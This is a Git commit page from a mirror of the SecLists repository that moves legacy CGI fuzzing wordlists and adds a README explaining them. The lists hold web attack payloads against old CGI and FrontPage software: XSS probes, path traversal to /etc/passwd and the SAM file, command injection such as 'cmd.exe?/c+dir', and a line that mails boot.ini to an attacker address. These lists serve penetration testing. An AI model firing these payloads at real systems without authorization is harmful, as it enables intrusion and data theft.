mirror of
https://github.com/danielmiessler/SecLists.git
synced 2026-08-17 12:50:12 +00:00
chore(wordlist): Moved CGI wordlists into the 'LEGACY-SERVICES/CGIs' directory
This commit is contained in:
committed by
ItsIgnacioPortal
parent
1acafeed3c
commit
9a4bb0523d
@@ -0,0 +1,6 @@
|
||||
_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
|
||||
_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
|
||||
_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
|
||||
_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
|
||||
admin/db.php
|
||||
_vti_bin/shtml.dll/_vti_rpc
|
||||
@@ -0,0 +1,7 @@
|
||||
post-query
|
||||
Config1.htm
|
||||
My_eGallery/public/displayCategory.php
|
||||
servlet/custMsg?guestName=<script>alert(document.cookie)(\
|
||||
servlet/CookieExample?cookiename=<script>alert(document.cookie)(\
|
||||
lastlines.cgi?process
|
||||
Mem/dynaform/Login.htm?WINDWEB_URL=%2FMem%2Fdynaform%2FLogin.htm&ListIndexUser=0&sWebParam1=admin000
|
||||
@@ -0,0 +1,74 @@
|
||||
# on windows, cgi dir is usually /scripts /cgi /cgi-bin, but could be named anything or be the webroot.
|
||||
cart32.exe
|
||||
get32.exe
|
||||
visadmin.exe
|
||||
foxweb.exe
|
||||
webplus.exe?about
|
||||
fpsrvadm.exe
|
||||
MsmMask.exe
|
||||
cmd.exe?/c+dir
|
||||
cmd1.exe?/c+dir
|
||||
post32.exe|dir%20c:\\
|
||||
cgitest.exe
|
||||
hpnst.exe?c=p+i=
|
||||
Pbcgi.exe
|
||||
testcgi.exe
|
||||
webfind.exe?keywords=01234567890123456789
|
||||
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C
|
||||
test-cgi.exe?<script>alert(document.cookie)</script>
|
||||
athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
|
||||
mkilog.exe
|
||||
mkplog.exe
|
||||
MsmMask.exe?mask=/junk334
|
||||
perl.exe?-v
|
||||
perl.exe
|
||||
ppdscgi.exe
|
||||
c32web.exe/ChangeAdminPassword
|
||||
windmail.exe
|
||||
dbmlparser.exe
|
||||
cgimail.exe
|
||||
minimal.exe
|
||||
rguest.exe
|
||||
visitor.exe
|
||||
webbbs.exe
|
||||
wguest.exe
|
||||
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
|
||||
cfgwiz.exe
|
||||
Cgitest.exe
|
||||
mailform.exe
|
||||
post16.exe
|
||||
imagemap.exe
|
||||
htimage.exe/path/filename?2,2
|
||||
htimage.exe
|
||||
Webnews.exe
|
||||
texis.exe/junk
|
||||
apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
|
||||
sensepost.exe?/c+dir
|
||||
testcgi.exe?<script>alert(document.cookie)</script>
|
||||
ion-p.exe?page=c:\winnt\repair\sam
|
||||
../../../../../../../../../../WINNT/system32/ipconfig.exe
|
||||
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
|
||||
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
|
||||
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
|
||||
foxweb.dll
|
||||
wconsole.dll
|
||||
shtml.dll
|
||||
scripts/slxweb.dll/getfile?type=Library&file=[invalid
|
||||
filename]
|
||||
rightfax/fuwww.dll/?
|
||||
WINDMAIL.EXE?%20-n%20c:\boot.ini%
|
||||
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\
|
||||
GW5/GWWEB.EXE
|
||||
GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
|
||||
GW5/GWWEB.EXE?HELP=bad-request
|
||||
GWWEB.EXE?HELP=bad-request
|
||||
echo.bat
|
||||
echo.bat?&dir+c:\\
|
||||
hello.bat?&dir+c:\\
|
||||
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
|
||||
input2.bat?|dir
|
||||
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
|
||||
test-cgi.bat
|
||||
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
|
||||
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
|
||||
_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X
|
||||
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,30 @@
|
||||
# CGIs
|
||||
|
||||
These wordlists are for testing legacy systems that use **Common Gateway Interface** scripts.
|
||||
|
||||
## CGI-HTTP-POST-Windows.fuzz.txt
|
||||
Use for: Exploiting various vulnerabilities in the now defunct WYSIWYG HTML editor and website administration tool, [Microsoft FrontPage](https://en.wikipedia.org/wiki/Microsoft_FrontPage)
|
||||
|
||||
Source: https://github.com/deepak0401/Front-Page-Exploit
|
||||
|
||||
Date of last update: Aug 27, 2012
|
||||
|
||||
The last version of FrontPage was released on 2003.
|
||||
|
||||
## CGI-HTTP-POST.fuzz.txt
|
||||
Use for: Exploiting/Discovering various vulnerabilities in extremely old systems (Circa 1998) that use "CGI".
|
||||
|
||||
Date of last update: Aug 27, 2012
|
||||
|
||||
This wordlist tests for the following vulnerabilities:
|
||||
- Default password in the [Nortel Meridian](https://en.wikipedia.org/wiki/Nortel_Meridian) private branch exchange **telephone switching system**. Source: [Nikto](https://github.com/sullo/nikto/blob/07653b73cb711972df72a8c66191468705a9b14e/program/databases/db_tests#L1167).
|
||||
- XSS in the **"Bajie HTTP JServer"** (software site completely defunct, no archives exist). Source: [Nikto](https://github.com/sullo/nikto/blob/07653b73cb711972df72a8c66191468705a9b14e/program/databases/db_tests#L803)
|
||||
- CGI Vulnerability in an unknown system (payload `lastlines.cgi?process`) which would allow attackers to "read arbitrary files and/or execute commands". Source: [Nikto](https://github.com/sullo/nikto/blob/07653b73cb711972df72a8c66191468705a9b14e/program/databases/db_tests#L1036)
|
||||
- Remote File Include in **[myPHPNuke](https://web.archive.org/web/20140812223623/http://www.myphpnuke.com/)**. Source: [Nessus](https://www.tenable.com/plugins/nessus/11836)
|
||||
- DoS in the **"D-Link Ethernet/Fast Ethernet Print Server DP-300+"**. Source: [Sullo's Security Advisory Archive](https://raw.githubusercontent.com/sullo/advisory-archives/master/phenoelit.de_dp-300.txt).
|
||||
|
||||
|
||||
## CGI-Microsoft.fuzz.txt
|
||||
Use for: Exploiting/Discovering various vulnerabilities in miscelaneous CGI scripts that run on Microsoft operating systems.
|
||||
|
||||
Date of last update: Aug 27, 2012
|
||||
Reference in New Issue
Block a user